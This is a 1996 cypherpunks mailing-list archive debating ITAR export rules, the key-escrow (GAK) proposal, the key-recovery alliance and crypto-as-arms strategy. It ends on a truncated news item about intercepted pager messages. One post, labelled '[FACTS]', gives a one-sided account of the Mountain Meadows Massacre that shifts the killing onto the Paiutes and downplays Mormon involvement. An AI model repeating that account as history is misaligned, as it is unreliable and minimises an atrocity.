"Every year the Republicans campaign like Libertarians, and then go to
Wasthington and spend like Democrats."

Vote Harry Browne for President.  http://www.harrybrowne96.org







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Thu, 3 Oct 1996 18:36:38 +0800
To: cypherpunks@toad.com
Subject: Fw: Re: ITAR satellite provision
Message-ID: <9610030712.AA02002@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Thu Oct 03 08:09:13 1996

- -----Begin Included Message ----- 

Date: 
 From: 
To: jimbell@pacifier.com
Cc: 

To: jimbell@pacifier.com
Date: Thu Oct 03 08:08:42 1996
> >*   A launch vehicle or payload shall not, by reason of the launching
> >*   of such vehicle, be considered an export for purposes of this
> >*   subchapter.
> Okay, everybody, call Estes!  We've got some crypto to export...er...laun
> ch!
If I get the above wording correctly (unicorn, help me!), it is sufficient 
to put the cryptostuff on a disc in a LAUNCHABLE device, it never says that 
the payload has to be delivered by air. So, just put that thing in a bag 
and get it through customs... (or does "by reason of ..." mean that the 
exclusive means of export allowed is launching ?)

remo pini

- ------< fate favors the prepared mind >------
Remo Pini                        rp@rpini.com
PGP:  http://www.rpini.com/crypto/crypto.html
- ----< words are what reality is made of >----

- ---- End of forwarded message ----
- ------< fate favors the prepared mind >------
Remo Pini                        rp@rpini.com
PGP:  http://www.rpini.com/crypto/crypto.html
- ----< words are what reality is made of >----
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv
Comment: http://www.rpini.com/crypto/crypto.html

iQEVAwUBMlNYihFhy5sz+bTpAQFnxwf/dvzBi/4wSb2IRUJfrpWGtIiHeq+BODKO
p+4P1Lqqh5aPPyjI38I8M0d7/KBrpIHAveQ7UNo2W42WrDHgieFJV55c0H8Envj/
+FOJu9KLR9Z6bQ327jYjmKCTbfdveRiZQX++/4eSud+LMtkByCzLv8IsGPjvKeTw
6fBxH1Zq0EUJuOGNFUx8hCqe6IssYyrr99DLFisfxdAFBdo5lP0ujNzQ/ov4iqki
qnFBugIViHikldzbq9e7KnASKP4RhkwAYpnJ85dlHCv8yJF3yjgItf6jSPG48/Xp
PkNa4bfp3LhpCRD8AEus/RNxpds28mUIktDluWgHuqP9Gy0ZI9xmpw==
=JOUm
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 4 Oct 1996 02:45:09 +0800
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: Clipper III on the table
In-Reply-To: <v03007813ae77351a2b54@[206.119.69.46]>
Message-ID: <199610031319.IAA01462@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


> At 2:53 pm -0400 10/1/96, Lucky Green wrote:
> > Note that the second article stated that the administration will allow
> > the use of stronger cypto than 56 bit once GAK is in place. If this is
> > true, much of the current industry resistance is likely to evaporate.
> > Even the promise might suffice.
> My brother has gone out and had all these nice bumperstickers made up. They
> say,
>        Wake up, America!
> He won't love you in the morning.

     Where could one aquire this bumpersticker?


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Thu, 3 Oct 1996 18:47:07 +0800
To: cypherpunks@toad.com
Subject: crypto cd once more
Message-ID: <9610030722.AA02515@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Thu Oct 03 08:19:15 1996
Does anyone know about interoperability of cd-rom filesystems?

Questions are:
1) is there a system that can handle unix, windows and mac filenames
   (long ones!)?
2) if not, is zip-support given on mac and unix systems?
3) does anyone have suggestions on how to deal with the problem?

See yall,

remo pini

- ------< fate favors the prepared mind >------
Remo Pini                        rp@rpini.com
PGP:  http://www.rpini.com/crypto/crypto.html
- ----< words are what reality is made of >----
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv
Comment: http://www.rpini.com/crypto/crypto.html

iQEVAwUBMlNa5BFhy5sz+bTpAQGHNAgAoW00xM24bxwb1THRA9AjzzNHY12TBo/m
CUz5+l0gDHxNi3+r+ys4QS1lrcj13BN0Xl71wHMjGvYnM86z+nB0loX8WIHep8h2
2M0PLOSGUdiJi8Ga+iB0LbzESBZWAokBF99ChXWVrtd6DBizfwBsPxNzENly1ZI3
2/gly09Z7L8HCa+PYpPI1S5IRqJqp14MDOFbCxLc3Nf5b9Pufp+GQPoxPp9o21nI
rYOAoK7ylKhCcZoPEC3asFL7y/uLyDWS8J8ypLC3d84Op9jQ1DJGPpRSk1Z2oEWQ
/FuKTC1tzyH8bGEDXX35rhlyudHqH2Se6shjq3l8CiM2S7pJMHqJzA==
=qU3O
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 4 Oct 1996 00:21:54 +0800
To: cypherpunks@toad.com
Subject: Re: Fw: Re: ITAR satellite provision
In-Reply-To: <Pine.SUN.3.94.961003071638.17409D-100000@polaris>
Message-ID: <Rq48uD22w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn <unicorn@schloss.li> writes:
> > To: jimbell@pacifier.com
> > Date: Thu Oct 03 08:08:42 1996
> > > >*   A launch vehicle or payload shall not, by reason of the launching
> > > >*   of such vehicle, be considered an export for purposes of this
> > > >*   subchapter.
> > > Okay, everybody, call Estes!  We've got some crypto to export...er...laun
> > > ch!
> > If I get the above wording correctly (unicorn, help me!), it is sufficient
> > to put the cryptostuff on a disc in a LAUNCHABLE device, it never says that
> > the payload has to be delivered by air. So, just put that thing in a bag
> > and get it through customs... (or does "by reason of ..." mean that the
> > exclusive means of export allowed is launching ?)
>
> The launching alone will not cause it to be an export.  If it is launched
> and then ends up outside the U.S., it could be an export.  Certainly if it
> is launched with the purpose of exporting crypto, it will be an export.

This reminds me of something I read about the race in the '50's and the '60's
as to whether the US or the USSR would launch the first satellite, the first
man in space, etc.

The US claimed that a nation's sovereignty ends a few thousand feet into
the atmosphere, so they had the right to fly the U2 planes at about 20K ft.

The Soviets supposedly kept claiming that everyone's airspace extends many
miles beyond the atmosphere, so if any US spy craft flying above Soviet
territory will be shot at.

Eventually the Soviets launched the first satellite and the first man in
space who, for technical reasons, had to fly through the space which the
USSR formerly recognized as other country's airspace. Then they suddenly
forgot about their claim and didn't even object when US remote sensing
satellites flew over the USSR some years later.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Thu, 3 Oct 1996 20:21:19 +0800
To: moroni@scranton.com>
Subject: [FACTS] Mountain Meadows Massacre
Message-ID: <199610030935.DAA24791@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


AFTER THIS POST, ALL RELIGION MUST GO OFF THE LIST! see banner below

First, in re: Dimitri's scurrilous attack:

    to paraphrase Winston Churchill...

        Dimitri: "attila, you are drunk!"
        Attila: "ah, Dimitri, you are ignorant, 
                    but I shall be sober in the morning!"

        I have met some pretty ignorant and some pretty violent men in
my life; despite your alledged education, you are a social 
abomination, an uncivilized boar, rooting in the gardens of
civilization, snorting your pleasure while distorting facts and 
reason.  You obviously fattened too long at the table of eminent
Russian diplomats like Kruschev, or even the brooding Brezenev.
If you must practice barbarism, go ahead --but go home. Life is
short enough without a constant stream of filth and errors from
an obviously small, illiterate, and undisciplined mind.

Now, concerning the completely ignorant, erroneus, and  slanderous
comment of Dimitri, the facts will follow the usual disclaimer:

    ***************************************************************
        I am neither an authority of nor a representative of "The Church
    of Jesus Christ and the Latter Day Saints" of which our current
    living Prophet, President Gordon B. Hinckley, is the sole authority
    to this world.  I do not speak for the Church, nor am I a recognized
    historian and/or spokesman for the Church.  Any opinions stated
    herein are my viewpoints as discerned from my studies of religion,
    in particular the historical aspect of the Church, and I accept all
    responsibilty for same.
    ******************************************************************* 
    If some of the list wish to either ask questions RESPONSIBLY or
    conduct a shared learning experience of the Mormon religious,
    community, and work ethic, please drop me a personal note, and
    I will both answer reasonable questions, and serve as moderator
    of a list if there is sufficient interest.  I think the libertarian faction 
    in particular might be both surprised and *stunned* by many of 
    the actual conditions in Utah versus preconceived views.
    *******************************************************************

now, back to our regularly scheduled programming <g>

the following is a compilation of information which is as 
reasonable a representation of the foul deed as I could assemble.

<html><head><title> Mountain Meadows Summary </title></head></html>
<body bgcolor="#0070c0" text=ffffff link=ff0000 vlink=00ffff alink=ff0000>

Regardless of whatever the facts, fears, and motives; under pressure
from the Paiute Indians, who had already surrounded the wagons, Mountain 
Meadows remains as the sole instance of an essentially unprovoked 
attack which possibly may have been assisted by a few Mormons; Mormons
who rarely even raised arms to defend themselves, and who trusted in 
the Lord to protect and preserve them. <p>

the wagon train in question at Mountain Meadows, which is
about 10-15 miles south of Enterprise and 40 miles northwest of
St. George on the Spanish Trail was beseiged by the Paiute Indians 
who had tolerated the wagon trains for many years.  However, this
train was insufficiently provisioned and they plundered both the 
Indians and the few settlers in the region for provisions. With at 
least 50 armed and mounted men, they were a significant force 
in the region at that time.

The Paiutes called on the local Mormons to help destroy them, 
or face attack from the Indians themselves.  Perceiving the 
wagon train as part of the general threat to their community, 
John D. Lee alledgedly lured them from their wagon train and 
the Paiute murdered all but a few of the children.<p>

However, given the continued persecution of the Saints for almost
thirty years, persecution which even followed them to vast empty lands
of the Utah Desert, the belief the wagon train was a group of prior
persecutors from Missouri, and the imminent presence of a full United 
States Army to occupy Utah, there was substantial and justifiable fear 
among Lee and his fellow settlers.<p>

The true facts of John D. Lee's actual involvement in the Massacre will
never be known.  There is no positive indication that anyone other than
Lee was involved; the community he founded immediately shunned him, 
even to the point of threats and ostracizing his children. Given John D.
Lee's fervor, he may have made the decision himself, therefore assuming 
the responsibility in the eye of a very biased federal territorial judge 
sent from Washington to enforce new federal laws which encompassed
confiscation of Mormon property and dissolving the church. Despite 
Lee's denials, and no material witnesses of fact. John D. Lee was tried
a second time and executed more than ten years after the incident. <p>

It is recorded that Jon D. Lee walked to his execution at Mountain
Meadows after his bitter final declaration, saying to his executioners:
<p>

    "...aim for the heart, boys.  Don't sully the flesh."<p>

Unfortunately, the Mountain Meadows is always one of the first items 
printed; in this case, even of questionable historical accuracy, after 
the usual overstated references to polygamy without regard for the 
economic and social necessity of the extended families in a society
with so many more widowed and unmarried women then there were men, 
to assemble complete family units. <p>  

    Polygamy, for instance,  existed in the Old Testament times,
basically for the same reasons, and with basically similar rules. <p>

  John D. Lee Biography  <br>
  John D. Lee - Last Words  <br>

</body></html>

    NOW, LET'S KEEP THIS OFF THE LIST.  join the newsgroup
alt.religion.mormon if you wish to argue; it has been "sniper's
alley" ever since its founding.

    ****************************************************************************
-.> Ryan Russell/SYBASE writes:
-.>
-.> > I guess that depends on your definition of liberty.  The Mormons 
- > > originally moved there to have a place to practice their religion, 
- > > and have freedom from persecution.  I suppose one could extend that 
- > > to wanting a place to have the freedom to have a set of rules consistant 
- > > with their beliefs.  Should that include freedom from interferance from
- > > folks such as yourself who want to change their rules, even though 
- > > you're not presently effected?

-.On Sun, 29 Sep 1996, Dr.Dimitri Vulis KOTM wrote:
-.> 
-.> It's worth noting that one of Utah mormons favorite pastimes was to ambush
-.> the settlers heading for California, kill them all, and take their property
-.> However the mormons were dealt with much less severely than the
-.> local Indians who tried the same tricks. Pity.
-.> 

on 10/02/96 at 10:28 PM, "Paul S. Penrod" <furballs@netcom.com> said:

-.Ah yes, the Mountain Meadows Massacre. I was wondering when you might  trot
-.that little bit of revisionist history out for display. BTW, its  your
-.revison of history, not the way it was recorded by many other  sources,
-.including first hand accounts by people who had witnessed the  whole affair
-.and recorded it in their journals, some of which made it to  the National
-.Archives and was researched almost 8 years ago in order to  raise a monument
-.to those mem and women who were felled there courtesy of  a miscommunication,
-.a late communication and the US Calvary.

-.You might want to read a *real* historical account of what actually  happened
-.before sounding off and leading the rest of us to believe you  are a graduate
-.of the Leon Panneta Fact Reporting School of Spin Doctoring.

-....Paul



--
  "I don't make jokes. 
    I just watch the government and report the facts."
        --Will Rogers





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Fri, 4 Oct 1996 02:09:52 +0800
To: Declan McCullagh <cypherpunks@toad.com
Subject: Re: White House crypto proposal -- too little, too late
Message-ID: <2.2.32.19961003133739.00a2944c@206.33.128.129>
MIME-Version: 1.0
Content-Type: text/plain


     "if you become a dangerous criminal," <> "innocent until proven guilty"

At 10:39 AM 10/2/96 -0700, Declan McCullagh wrote:
>[But how does one undo the dangerous criminals without violating the
>privacy rights of everyone else? --Declan]
>---------- Forwarded message ----------
>Date: Wed, 2 Oct 1996 10:30:43 -0700 (PDT)
>From: Joe Shea <joeshea@netcom.com>
>To: Declan McCullagh <declan@well.com>
>Subject: Re: White House crypto proposal -- too little, too late
>
>
>	If you become a dangerous criminal, Declan, I think law
>enforcement does have the right to use key escrow to undo you.  That has
>nothing to do with spying.  You need to be a little more selective about
>your language, and to make distinctions a little more rationally than you
>do. 
>
>Best,
>
>Joe Shea
>Editor-in-Chief
>The American Reporter
>joeshea@netcom.com
>http://www.newshare.com:9999
>
>
>On Wed, 2 Oct 1996, Declan McCullagh wrote:
>
>> BTW, Joe, I'm still waiting for your response to my comments on why
>> your endorsement of key escrow (GAK) is braindead. Or do you still
>> think that the Feds should have the right to spy on my conversations,
>> just like you thought that "porn isn't speech?"
>> 
>> -Declan
>> 
>> 
>> On Wed, 2 Oct 1996, Joe Shea wrote:
>> 
>> > Date: Wed, 2 Oct 1996 09:47:59 -0700 (PDT)
>> > From: Joe Shea <joeshea@netcom.com>
>> > To: Declan McCullagh <declan@well.com>
>> > Cc: cypherpunks@toad.com
>> > Subject: Re: White House crypto proposal -- too little, too late
>> > 
>> > 
>> > 
>> > 	Declan, how does your list work?  Do you only publish comments 
>> > that agree with you?  I didn't see my first two, and this one only came 
>> > with your response.  Is this your version of freedom of the press, or what?
>> > 
>> > Joe Shea
>> > Editor-in-Chief
>> > The American Reporter
>> > joeshea@netcom.com
>> > http://www.newshare.com:9999
>> > 
>> > 
>> > On Wed, 2 Oct 1996, Declan McCullagh wrote:
>> > 
>> > > 
>> > > 
>> > > ---------- Forwarded message ----------
>> > > Date: Tue, 1 Oct 1996 20:19:16 -0700 (PDT)
>> > > From: Declan McCullagh <declan@well.com>
>> > > To: fight-censorship@vorlon.mit.edu
>> > > Cc: joeshea@netcom.com
>> > > Subject: Re: White House crypto proposal -- too little, too late
>> > > 
>> > > [Joe, this may be yet another area where we disagree. It represents a
>> > > power grab by law enforcement; the infrastructure is prone to failure
>> > > and can be compromised; it's more government meddling and coercion and
>> > > more restrictions on free speech; the Fed bureaucrats controlling this
>> > > are vulnerable to special-interest lobbying; the Constitution gives
>> > > the Federal government no right to impose such restrictions; the FBI
>> > > has demonstrated that we can't trust the Feds with our most personal
>> > > information; it violates an absolute right to privacy; and it's
>> > > technically impractical for a good number of applications. --Declan]
>> > > 
>> > > 
>> > > ---------- Forwarded message ----------
>> > > Date: Tue, 1 Oct 1996 15:57:51 -0700 (PDT)
>> > > From: Joe Shea <joeshea@netcom.com>
>> > > To: Declan McCullagh <declan@well.com>
>> > > Cc: fight-censorship
>> > > Subject: Re: FC: White House crypto proposal -- too little, too late
>> > > 
>> > > 
>> > > 	Declan's most recent piece makes much more sense than the earlier
>> > > one.  He is quite correct in emphasizing the future vulnerability of the
>> > > encryption logarithms rather than centering on whether or not terrorists
>> > > might use them.  By making them impossible to crack without the key, and
>> > > permitting the key to be available to appropriate law enforcement
>> > > authorities when absolutely necessary, everyone's real needs are 
>> > > satisfied, I think.  I enjoyed this report a lot.
>> > > 
>> > > Best,
>> > > 
>> > > Joe Shea
>> > > Editor-in-Chief
>> > > The American Reporter
>> > > joeshea@netcom.com
>> > > http://www.newshare.com:9999
>> > > 
>> > > 
>> > > 
>> > > 
>> > > 
>> > 
>> 
>> 
>
>
>
_______________________
Regards,          You cannot depend on your eyes when your imagination 
                  is out of focus. -Mark Twain
Joseph  Reagle    http://rpcp.mit.edu/~reagle/home.html
reagle@mit.edu    E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Walt Armour <walt@animal.blarg.net>
Date: Fri, 4 Oct 1996 06:04:46 +0800
To: cypherpunks@toad.com
Subject: Key recovery/RSA/Bidzos/WTF?!?
Message-ID: <199610031655.JAA18003@animal.blarg.net>
MIME-Version: 1.0
Content-Type: text


What's up with some of these press releases?

Can anyone clear up the confusion with RSA/Bidzos/Key recovery?

Here are some quotes:

=================

>From NYT:CyberTimes (2 Oct)
"Clinton Encryption Plan Is Generating Resistance"

Executives of the International Business Machines Corp. said
late Tuesday that they were still lining up the final list of
companies in the alliance. Those involved will include Digital
Equipment and smaller data-security companies including RSA
Data, Cylink and Trusted Information Systems. 

=================

>From NYT:CyberTimes (2 Oct)
"Clinton Encryption Plan Is Generating Resistance"

"The government announcement is disastrous," said Jim Bidzos,
chief executive of RSA Data Security, one of the country's
leading developers of data-scrambling software. "We warned IBM
that the National Security Agency would try to twist their
technology." 

=================

>From BusinessWire (2 Oct)
"JOINT PRESS ANNOUNCEMENT/ HIGH-TECH LEADERS JOIN FORCES TO
ENABLE INTERNATIONAL STRONG ENCRYPTION"

"Export controls are a fact of life," said Jim Bidzos, president
of RSA Data Security. "The key recovery alliance's approach will
allow companies to use cryptography with differing levels of
security in an interoperable way. When the alliance implements
this technology it will give the user a new level of flexibility
that did not exist before. In an imperfect world this technique
will at least allow you to take advantage of what governments
around the world will allow."

=================

So is RSA part of this or not? 
Is the middle quote above mis-attributed?

walt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 4 Oct 1996 05:37:54 +0800
To: cypherpunks@toad.com
Subject: Re: The Right to Keep and Bear Crypto
Message-ID: <199610031709.KAA28569@dfw-ix11.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:29 PM 10/2/96 -0700, azur@netcom.com (Steve Schear) wrote:
>>T[i]m May wrote:
>>I've argued since 1992 on Usenet and here that "crypto as arms" is a
>>potentially dangerous tack to follow. (Others, including legal experts,
>>have also argued this point.)
>>
>>Given that it is well-established, whether we agree or not, that the USG
>>may restrict private ownership of atom bombs, nerve gases, CBW weapons,
>>machine guns, switchblade knives, nunchuk sticks, and various other "arms,"
>>the association of crypto with armaments is potentially *DISASTROUS*.
>
>Unless we get the strong support of the gun lobby and NRA.

The gun lobby and NRA are generally against handgun registration,
but haven't stopped it.  We're against crypto key registration.
The gun lobby and NRA are generally against machine gun licensing requirements,
but haven't stopped it.  We're against strong crypto licensing requirements.
The gun lobby and NRA are generally against firearms dealers' licensing,
but haven't stopped it.  We're against crypto dealers' licensing.
The gun lobby and NRA are generally against assault weapon import laws,
but haven't stopped them.  We're against strong crypto import laws.
The NRA supports Instant Background Checks (because it thinks they're
less bad than N-Day Waiting Periods).  We're against central government
permitted-users databases, and we're against Key "Escrow" even if some
people think it's less bad than an outright ban.
The NRA supports the politically incorrect hunting enthusiasts.
We (generally) support politically incorrect tax evasion, black markets
in recreational pharmaceuticals, and free speech for people we dislike.

If your lobbyists lose and you have to register your gun, it still works.
If your lobbyists lose and you have to register your crypto keys, you lose;
that means the government or anybody who can get your keys can crack your stuff.
If your lobbyists lose and you have to get permission to make guns,
most of the interesting guns can still be made.  
If your lobbyists lose and you have to get permission to write crypto,
many of the interesting crypto applications won't get written -
we not only depend on the free flow of ideas, but on people doing applications
as a hobby or a small business that can't afford to become
Registered International Arms Dealers, don't want to wait the months
that such registration takes for background checks, and don't want to
give up all the privacy involved just so they can write a bug report
for somebody else's code or suggest an improvement.

Face it, as much as the Gun Lobby has slowed down the growth of anti-gun laws,
they've still lost step by step, law by law, against a government that's
succeeded in scaring the public about threats to public safety and
in convincing the public that only the military needs strong weapons
and that registering everyday-use weapons is just fine.
I support much of what they do, and I'd be happy if they supported us,
and it's probably easier to get their support on crypto than drug rights,
but we can't _depend_ on it.

Also, getting public support for crypto is a hearts-and-minds deal;
the press generally dislikes guns, and generally approves of free speech,
and press support is important - especially since the press's default behaviour
is to believe government press reports about crypto-narco-porno-terrorists
using assault remailers.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
America's Open Presidential Debate - Beyond Dole and Clinton!
<A href="http://gate.net/~bdcollar/bbe/debate.htm">Tuesday, Oct. 8th 8:00 PM
EDT</a>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 4 Oct 1996 06:00:19 +0800
To: Adam Shostack <adam@homeport.org>
Subject: Re: NYT on IBM GAK
Message-ID: <199610031711.KAA25345@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:51 AM 10/3/96 -0500, Adam Shostack wrote:
>Rich Burroughs wrote:
>
>| The word "boycott" leaped into my mind.  I personally do not believe that I
>| will be buying products from any of these companies, as long as thay
>| participate in this GAK charade.
>
>	Folks,
>	Lets be reasonable.  Its time to jump on board the GAK
>bandwagon.  After all, where better to disrupt the music?  We need to
>start writing GAK software, and it better be up to the high standards
>that the NSA sets for itself.
>
>	Once we've written it, and its being distributed, we can say
>'See, another broken bit of GAK software.  Not even the NSA could get
>it right.  Our data is too important to be using broken software to
>protect us.'
>	And we have 56 bit exportability in hand.
>Adam

The problem is that the appearance of defeat could easily guaranteee the 
real defeat itself.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 4 Oct 1996 06:20:00 +0800
To: Black Unicorn <rp@rpini.com>
Subject: Re: Fw: Re: ITAR satellite provision
Message-ID: <199610031711.KAA25355@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:17 AM 10/3/96 -0400, Black Unicorn wrote:
>On Thu, 3 Oct 1996, Remo Pini wrote:

>> Date: Thu Oct 03 08:08:42 1996
>> > >*   A launch vehicle or payload shall not, by reason of the launching
>> > >*   of such vehicle, be considered an export for purposes of this
>> > >*   subchapter.
>> > Okay, everybody, call Estes!  We've got some crypto to export...er...laun
>> > ch!
>> If I get the above wording correctly (unicorn, help me!), it is sufficient 
>> to put the cryptostuff on a disc in a LAUNCHABLE device, it never says that 
>> the payload has to be delivered by air. So, just put that thing in a bag 
>> and get it through customs... (or does "by reason of ..." mean that the 
>> exclusive means of export allowed is launching ?)
>
>The launching alone will not cause it to be an export.  If it is launched
>and then ends up outside the U.S., it could be an export.  Certainly if it
>is launched with the purpose of exporting crypto, it will be an export.

Too bad you didn't support this with a logical argument.  The wording was 
clearly intended to be an exception to a rule.  What the wording doesn't 
include is the "exception to the exception," most likely because they 
weren't thinking in too great a detail when they wrote the regulations.  But 
if the regulation is "wrong," the fault of that is those who wrote the 
regulation.  (and we, the public, are entitled to assume that the regulation 
is "right" in its literal meaning.)

It appears that the government left a loophole so large that  you could 
drive a truck...er...shoot a rocket through it.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will Rodger <rodger@interramp.com>
Date: Fri, 4 Oct 1996 02:32:42 +0800
To: cypherpunks@toad.com
Subject: Re: FUCK!!!!!!;-)
Message-ID: <1.5.4.32.19961003141245.006604ec@pop3.interramp.com>
MIME-Version: 1.0
Content-Type: text/plain


Someone who won't put his name to things he writes wrote:

At 04:05 AM 10/3/96 -0400, Anonymous wrote:
>+ --- begin forwarded text
>+ 
>+ "Keys" are strings of computer code that lock and unlock data.   Key recovery
>+ is an approach that permits the recovery of lost or  damaged keys without the
>+ need to store or "escrow"  them with a third party.  This approach could also
>+ meet the needs of law enforcement to act under the authority of a court order
>+ without risking the  confidentiality of business data.
>
>Just wondering how much of a problem "damaged keys" really are in
>practice.  Is this something specific to Microsoft filesystems or
>really cheap tape drives?  I've never seen that problem under Unix,
>and something like a private RSA key doesn't change very often, so you
>would expect to have encrypted copies of it on many backup tapes.
>
>Or maybe this journalist, like most, doesn't know what the fuck he's
>talking about?
>

To which this card-carrying member of the media replies:

Companies cited in the PRESS RELEASE - that means public relations product,
not journalism product - were involved in signing off on what went into the
release. By definition, no member of the press was involved in producing
this document

It seems directing questions to the companies would be a good idea.

Will Rodger
Washington Bureau Chief
Interactive Week.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 4 Oct 1996 05:36:22 +0800
To: cypherpunks@toad.com
Subject: Re: Fighting Clipper III
In-Reply-To: <v03007802ae791065bbd7@[205.162.51.35]>
Message-ID: <v03007801ae79afc6404c@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:37 AM -0700 10/3/96, Declan McCullagh wrote:
>You'll have trouble doing a successful boycott of RSA. What, you won't
>use Netscape Navigator or PGP?

We should be happy that both Netscape and Microsoft are conspicuously
missing from the list of GAK conspirators. We need to somehow keep it this
way.

On the list of GAK conspirators itself, this just confirms the "behind the
doors key escrow deal" I wrote about more than two years ago (check the
archives, for August 1994, under the thread name "Software Key Escrow" or
something close to this). A person within Microsoft confirmed to me that a
deal was being cut to put key escrow into _software_, rather than the
Clipper chip-based hardware option which was then dominant in the
discussions. (The plan followed revelations of a TIS-NSA-Berkeley axis that
developed in early '94 and that was made semi-public at the Karlsruhe,
Germany conference in the spring of '94.)

That Bill Gates has since come out strongly against software key escrow,
and that Microsoft has not joined this deal, is terribly important.
Netscape has also spoken against mandatory key escrow systems, in the
person of James Barksdale. (I'm not sure what Jim Clarke's position is
these days, after his much-discussed pro-GAK comments of about a year ago;
in any case, he's no longer actively supporting GAK from what I can see.)

Question: If RSADSI supports GAK, and Netscape/Microsoft license some
technologies from RSADSI, could Netscape or Microsoft then be forced to
adopt GAK?

(Personally, I don't see how. The core crypto routines might be licensed,
but these deals were probably negotiated a while back. But who knows?)

I think we should support Microsoft and Netscape in their nonparticipation
in the Cabal. Sometimes being an 800-pound gorilla has its advantages.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 4 Oct 1996 05:48:01 +0800
To: cypherpunks@toad.com
Subject: Re: Flood Warning
Message-ID: <199610031731.KAA26729@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:47 PM 10/3/96 GMT, John Young wrote:

>   High-Tech Leaders Join Forces to Enable International 
>   Strong Encryption 
> 
>      See: http://www.ibm.com/news/alliance2.htm 

This is apparently no longer valid.  Is there a new one?


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 4 Oct 1996 06:11:54 +0800
To: cypherpunks@toad.com
Subject: RE: The Right to Keep and Bear Crypto
In-Reply-To: <n1367779560.35309@mail.ndhm.gtegsc.com>
Message-ID: <v03007803ae79b7740e1b@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:39 AM -0400 10/3/96, Mullen Patrick wrote:

>However, all of this is irrelevant, because I must say, Tim May has the
>proper idea -- We may have the right to bear crypto, but the government
>has the right to limit the types/amounts of crypto we bear.

Careful! I did not say this. At least not in the form here.

>** Success in this matter is classifying crypto as speech **

This was closer to the point I actually made.

>I read somewhere (probably here) about a case which was (was destined??) to
>be a precedent for crypto as speech.  All I can remember was something about
>the code being classified as speech, or something like that.  Sorry I can't
>quite remember what it was.  Anyone have any suggestions/references?

This was Judge Patel's earlier ruling in the Bernstein matter, much
discussed here of late. But until the Supremes get the case, eventually,
and rule on it one way or another, I think it's not well-established.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Nicolas J. Hammond" <njhm@ns.njh.com>
Date: Fri, 4 Oct 1996 04:12:39 +0800
To: cypherpunks@toad.com
Subject: British Labour leader's pager messages intercepted
Message-ID: <199610031458.KAA07791@ns.njh.com>
MIME-Version: 1.0
Content-Type: text/plain


The following article appears in the Electronic Telegraph today (Oct 3)


TWO sensitive messages detailing Tony Blair's movements are among a list
of electronic pager notes about the Labour leader and members of the
shadow cabinet intercepted by hackers.

 The list of messages, which
 was shown to The Daily Telegraph, had been read by equipment freely
